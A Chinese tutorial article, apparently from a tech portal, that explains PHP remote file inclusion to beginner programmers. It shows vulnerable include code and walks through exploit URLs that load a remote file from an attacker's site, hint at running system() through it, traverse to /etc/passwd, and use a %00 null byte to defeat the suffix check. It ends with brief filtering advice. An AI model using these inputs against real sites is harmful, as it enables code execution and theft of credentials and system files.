是什么造成PHP远程文件包含漏洞产生

开发 后端
远程文件包含漏洞,就是服务器通过PHP的任意文件包含过滤不严,从而去执行一个恶意文件,这是程序过滤上的问题。本文介绍了产生PHP远程文件包含漏洞产生的原因,希望能给大家到来帮助。

对于初级PHP程序员来说,对于PHP的安全性还不能完全掌握。首先我们需要了解致使程序漏洞的原理。下面我们就来介绍一下PHP远程文件包含漏洞的产生原因。

首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过PHP的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。

1.找出PHP远程文件包含漏洞bug:

为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在PHP里,我们使用include()函数,它的工作流程:

如果你在Main.PHP里包含include1.PHP,我将这样写include("include1.PHP").不是很科学,但你要知道其中的道理。

我们先看这个,当用户输入通过后就包含文件,也就是

  1. if ($_GET[page]) {  
  2. include $_GET[page];  
  3. else {  
  4. include "home.PHP";  

 

这种结构在动态网站里是常见的,问题是它允许这样 [url]hxxp://www.target.com/explame.PHP?page=main.PHP[/url] 或者[url]hxxp://www.target.com/explame.PHP?page=downloads.PHP[/url]来查看。无论如何,如果你的程序里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,文件包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程序员依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。

2.测试

这里有个远程文件包含的例子,目的只有一个,为了你的程序安全,我们来看具体的

 

  1. [url]hxxp://www.target.com/explame.PHP?page=zizzy[/url]  
  2.  
  3. Warning: main(zizzy): failed to open stream: No such file or directory  
  4.  
  5. in /var/www/htdocs/index.PHP on line 3  
  6.  
  7. Warning: main(): Failed opening 'zizzy' for inclusion  
  8.  
  9. (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/index.PHP on line 3 

 

PHP输出的这些错误信息告诉我们,程序去包含文件/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的文件,现在理解PHP远程文件包含漏洞了吧。

3.利用

PHP确实很好,可以远程调用文件,那我创建一个yeah.txt,放在我的站上[url]hxxp://www.mysite.com/yeah.txt.[/url]内容这样

  1. < ?  
  2. echo "Wow,test!";  
  3. ?> 

 

那么

  1. [url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] 

 

回显Wow,test!,这样就执行了。读取config.PHP也不难吧,里面放了mysql密码啊。把yeah.txt写成看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../../../../etc /passwd。知道什么叫真正的包含了吧。

4.另一种PHP远程文件包含漏洞的原理

有时程序员换种写法,写成这样,限制了包含范围

  1. if ($_GET[page]) {  
  2. include "$_GET[page].PHP";  
  3. }   
  4. else   
  5. {  
  6. include "home.PHP";  

 

我们提交

  1. [url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url]  
  2.  
  3. Warning: main([url]hxxp://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream:  
  4.  
  5. hxxp request failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3  
  6.  
  7. Warning: main(): Failed opening 'hxxp://www.mysite.com/yeah.txt.PHP' for inclusion  
  8.  
  9. (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3 

 

包含失败了,限制了后缀名为PHP,把mysite.com的yeah.txt改为yeah.PHP,然后照样执行。那passwd怎么办?

 

  1. Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: hxxp request  
  2.  
  3. failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3  
  4.  
  5. Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion  
  6.  
  7. (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3 

 

在这里使用个NUL字符,也就是%00来跳过检测

 

  1. [url]hxxp://www.target.com/explame.PHP?pa.../etc/passwd%00[/url] 

 

看见了吧。

包含文件时最好指定好包含哪一个文件,或者过滤好提交的的变量,这也就是这篇PHP远程文件包含漏洞文章的目的,不是写给hacking的人看,而是写给那些初涉程序员的人,这样的文章网上很多,只要有人受益,也就达到目的了。

【编辑推荐】

  1. 优秀的PHP开发者是怎样炼成的?
  2. PHP开发者常犯的10个MySQL错误
  3. 10个免费的PHP脚本资源下载网站推荐
  4. 系统性能的调优:优化Apache和PHP
责任编辑:于铁 来源: 赛迪网
相关推荐

2009-12-09 09:49:40

2009-07-06 17:47:44

2012-04-12 16:05:50

2010-09-14 17:49:14

溢出漏洞

2018-05-23 21:19:44

云计算企业云支出

2012-03-10 21:22:57

Lumia

2015-04-02 16:26:39

漏洞检测工具Kadimus

2013-07-03 11:28:47

2009-12-04 15:42:57

PHP文件缓存

2021-11-08 07:26:36

Vailyn漏洞安全工具

2014-07-31 11:33:11

2009-11-22 15:28:35

2023-07-31 00:13:21

2023-05-29 14:47:46

语音诈骗漏洞人工智能

2013-09-04 09:59:33

拟物化UI设计扁平化

2010-09-13 17:57:12

执行漏洞

2012-02-06 09:14:26

2009-07-06 17:34:20

PEARMail函数php

2010-09-17 16:01:55

代码执行漏洞EXE文件

2009-10-21 14:31:15

漏洞补丁
点赞
收藏

51CTO技术栈公众号